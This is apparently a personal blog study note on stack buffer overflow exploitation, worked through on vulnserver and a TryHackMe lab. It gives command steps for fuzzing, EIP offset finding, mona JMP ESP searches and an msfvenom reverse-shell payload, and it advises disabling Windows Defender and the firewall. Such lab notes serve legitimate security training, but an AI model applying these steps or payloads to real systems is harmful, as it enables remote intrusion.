Home Buffer over flow
Post
Cancel

Buffer over flow

By Yuchao
Posted 2022-03-27 Updated 2022-06-22 3 min read

Learn from Video

understand stack MOST IMPORTANT !!!

What happens when you call a procedure?

  • https://www.youtube.com/watch?v=RU5vUIl1vRs

Assembly Programming Assembly Function Stack Frame Explained

  • https://www.youtube.com/watch?v=vcfQVwtoyHY
1
2
3
4
5
6

{low}
ESP points to the top of the stack, at lower memory location.
{buffer}
EBP points to higher memory address, at the bottom of the stack, 
EIP holds the address of next instruction to be executed.
{high}

1
2
3
4
5
6
7
8
9
10

(one function on stack)
lower address

at ESP value (Extended Stack Pointer)
this Buffer Space
at EBP value (Extended Base Pointer)
at EIP value (Extended Instruction Pointer) / Return Address
shellcode start point

higher address

The process:

  1. ESP hit command to get input, and the input change the stack value. EBP right, know next is EIP, EIP right. Value in stack wrong.
  2. when ESP hit where EBP saves(on stack), the EBP value will change(or not). EBP wrong, EIP right.
  3. when ESP hit where EIP saves(on stack), the EIP value will change.(to an address with value “JMP ESP”)
  4. then ESP value increase. (so its meaningfull when we jump back, to the payloads.)
  5. EIP do JMP ESP (JMP back to where the ESP is now pointing.)
  6. EIP do the payload commands line by line.
1
2
3
4
5
6
7
8
9
10

(one program in memory)
(EIP start from TEXT, when meet a function, point to STACK return address))

lower address
TEXT
DATA
HEAP
STACK
higher address

RET instruction:

  • This will take a dword from the top of the stack at esp and load it to eip,
  • while also adding 4 to esp’s value (to move it up to the next entry)

Another way(not JMP ESP):

  • PUSH ESP, RET
  • https://www.rcesecurity.com/2011/12/buffer-overflow-exploitation-jump-to-shellcode-via-push-espret/

Cyber Mentor BOF video and his recommendation

  • https://www.youtube.com/watch?v=ncBblM920jw
  • https://github.com/johnjhacking/Buffer-Overflow-Guide
  • https://tcm-sec.com/buffer-overflows-made-easy/

Practice by vulnserver and Immunity Debugger

vulnserver

  • https://thegreycorner.com/vulnserver.html if Windows block the download, turn off Windows Defender.

Immunity Debugger

  • https://www.immunityinc.com/products/debugger/

Cyber Mentor BOF process:

  1. Spiking
  2. Fuzzing
  3. Finding the Offset
  4. Overwriting the EIP
  5. Finding Bad Characters
  6. Finding the Right Module
  7. Generating Shellcode
  8. Root
1
2
3

nc -nv 192.168.1.90 9999
connect to vuln server
command, STATS [stat_value]

1. Spiking

generic_send_tcp apt-get install spike

  • ./generic_send_tcp host port spike_script SKIPVAR SKIPSTR
  • ./generic_send_tcp 192.168.1.100 701 something.spk 0 0

2. Fuzzing

Send different characters try to break the program to find the offset

1
2

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 386F4337

3. Finding the Offset

find EIP at 2003

4. Overwriting the EIP

  • EIP is 4 bytes. (32-bits)
  • Shellcode = “A” * 2003 + “B” * 4
  • check if B start at EIP.
  • HEX 41: A. HEX 42: B.
  • EIP = “42424242” will be successful.

5. Finding Bad Characters

  • google: “badchars”
  • !mona bytearray -cpb “\x00”

6. Finding the Right Module

Find DLL without memory protection.
  • search mona.py, save to /Immunity Debugger/ PyCommands.
Get JMP ESP shell code
1
2
3
4
5
6
7

# locate nasm_shell
# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
──(root💀kali)-[/home/kali]
└─# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
nasm > JMP ESP
00000000  FFE4              jmp esp
in mona, search JMP ESP location
1
2

!mona modules
!mona find -s \xff\xe4" -m essfunc.dll

anotherway: !mona jmp -r ESP -m “essfunc.dll” this module has no memory protections

7. Generating Shellcode

msfvenom -p windows/shell_reverse_tcp LHOST={IP} LPORT={Port} EXITFUNC=thread -f c -a x86 -b “\00”

in python3: put ‘b’ before shell code, means byte encode.

THM Brain storm box

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

nmap -T4 -p- -Pn 10.10.131.179
get: 21, 3389, 9999

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ftp 10.10.131.179
name: anonymous

ftp> ls
chatserver.exe
essfun.dll

ftp> prompt OFF
ftp> binary
for safe transfer, byte may crash

ftp> mget *

ftp> bye
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

in Windows
defender off
firewall off

\r = CR (Carriage Return) → Used as a new line character in Mac OS before X
\n = LF (Line Feed) → Used as a new line character in Unix/Mac OS X
\r\n = CR + LF → Used as a new line character in Windows

THM practice

  • https://tryhackme.com/room/bufferoverflowprep
  • https://github.com/Tib3rius/Pentest-Cheatsheets/blob/master/exploits/buffer-overflows.rst
  • https://github.com/andyfeili/OSCP_BufferOverflow_Cheatsheet
sec
bof assembly thm
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents